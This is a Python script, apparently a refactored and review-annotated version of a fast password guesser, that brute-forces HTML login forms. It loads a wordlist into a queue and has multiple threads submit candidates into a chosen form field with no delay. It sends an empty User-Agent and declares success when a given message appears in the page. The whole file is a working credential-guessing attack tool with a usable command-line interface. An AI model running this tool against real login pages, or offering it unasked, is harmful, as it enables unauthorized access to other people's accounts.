import argparse, threading, queue, requests
from urllib.parse import urljoin, parse_qsl
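# --- Command-line interface -------------------------------------------------
# The parser gets its own name so the ``argparse`` module is not rebound to an
# ArgumentParser instance.
parser = argparse.ArgumentParser(description="A fast password guesser for HTML forms")
# Every option is read unconditionally further down, and the worker swallows
# exceptions, so a missing option used to end in a misleading
# "Password not found" (or a bare TypeError for --threads). Marking them
# required turns that into a usage error before any traffic is sent.
parser.add_argument("-u", "--url", required=True, help="Enter the url of form action")
parser.add_argument(
    "-d",
    "--data",
    required=True,
    help="Enter the exact query string(in case of GET) and body data (in case of POST)",
)
parser.add_argument(
    "-m", "--method", required=True, help="Enter the form method (GET/POST)"
)
parser.add_argument(
    "-f", "--field", required=True, help="Enter the key name to be brute forced"
)
parser.add_argument(
    "-s",
    "--success",
    required=True,
    help="Enter the unique message in case of successful login",
)
parser.add_argument(
    "-t",
    "--threads",
    required=True,
    type=int,
    help="Enter the number of threads to run",
)
args = parser.parse_args()
if args.threads < 1:
    # With zero workers the queue is never consumed and the run would report
    # a negative result without having sent a single request.
    parser.error("--threads must be at least 1")

url = args.url
data = args.data
method = args.method
success_message = args.success
threads = args.threads
field = args.field

# --- Shared HTTP session ----------------------------------------------------
# All form submissions made by the workers go through this one session.
s = requests.Session()
# The session sends an empty User-Agent header on every submission; in
# server-side logs that is a stable attribute of the traffic this script
# generates.
s.headers["User-agent"] = ""
if method == "POST":
    # The body is assembled by hand as "k=v&k=v", so declare it as form data.
    s.headers["Content-type"] = "application/x-www-form-urlencoded"

# --- Reachability probe -----------------------------------------------------
# One plain GET sent outside the session (so it carries the library's default
# headers, not the empty User-Agent). Only transport-level failures are
# caught; the old bare ``except`` also swallowed unrelated errors, and the
# probe had no timeout, so an unresponsive host could block indefinitely.
try:
    requests.get(url, timeout=3)
except requests.RequestException:
    print("[-] Could not connect to the url..")
    # Non-zero status so a calling script can tell the run never started.
    raise SystemExit(1)

# --- State shared with the worker threads -----------------------------------
guessed = False  # set to True by the first worker that sees the success text
correct_password = ""  # candidate that triggered the success text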
def http_guesser():
    """Worker loop: submit queued candidates to the form until one matches.

    Runs in each worker thread. While the shared ``guessed`` flag is unset and
    ``q`` still holds items, the next candidate is taken from ``q``, written
    into the ``field`` pair of the module-level ``data`` template, and sent
    through the shared session ``s`` using ``method`` and ``url`` with a
    3-second timeout. When the lower-cased response body contains
    ``success_message``, ``guessed`` is set and the candidate is stored in
    ``correct_password``.

    Behaviour worth knowing when reading logs or results of a run:

    * Exactly one request is issued per candidate, with no delay or back-off
      between iterations.
    * The pair to overwrite is selected with a substring test, so any pair
      whose text contains ``field`` is replaced, and the candidate is joined
      in as-is.
    * Only the response body is lower-cased before the comparison;
      ``success_message`` is compared unchanged.
    * Every exception raised inside the ``try`` is discarded, so a failed
      request is indistinguishable from a rejected candidate.
    """
    global guessed, correct_password
    while not (guessed or q.empty()):
        # NOTE(review): the emptiness check and this get() are separate
        # steps, so with several workers this call can block if another
        # thread drains the queue in between.
        candidate = q.get()
        try:
            print(f"[:] Trying.. {candidate}")
            params = data.split("&")
            for idx, pair in enumerate(params):
                if field in pair:
                    params[idx] = "=".join([field, candidate])
            body = "&".join(params)
            response = s.request(method, url, data=body, timeout=3)
            page_text = response.content.decode().lower()
            if success_message in page_text:
                print(f"[+] Success message triggered on : {candidate}")
                correct_password = candidate
                guessed = True
        except:
            # NOTE(review): bare except kept as in the original; it hides
            # timeouts, decode errors and programming errors alike.
            pass
        q.task_done()
# Work queue shared by all workers; filled completely before any thread starts.
q = queue.Queue()
# The wordlist path is fixed and relative to the current working directory.
# The file is read into memory in one go, one candidate per line.
with open("wordlists/password_list", "r") as wordlist:
    for password in wordlist.read().splitlines():
        q.put(password)

# Create the requested number of workers, start them, then wait for all of
# them. They are daemon threads, but the joins below make the main thread
# block until each one has returned.
threadsl = [
    threading.Thread(target=http_guesser, daemon=True) for _ in range(threads)
]
for t in threadsl:
    t.start()
for t in threadsl:
    t.join()

# Report the outcome recorded by the workers in the shared globals.
print(
    f"[+] Password found : {correct_password}"
    if guessed
    else "[-] Password not found.."
)